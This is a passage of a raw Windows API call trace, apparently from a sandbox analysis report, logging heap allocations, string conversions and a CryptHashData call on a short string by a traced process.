Size=0x4) returned 0x2e550c8 [0241.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0241.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0241.450] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0241.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0241.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ff8 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.454] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0241.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0241.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0241.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0241.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e515b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0241.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.457] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0241.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.457] CryptHashData (hHash=0xa87510, pbData=0x2e55008, dwDataLen=0x3, dwFlags=0x1) returned 1 [0241.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0241.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0241.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0241.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0241.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap 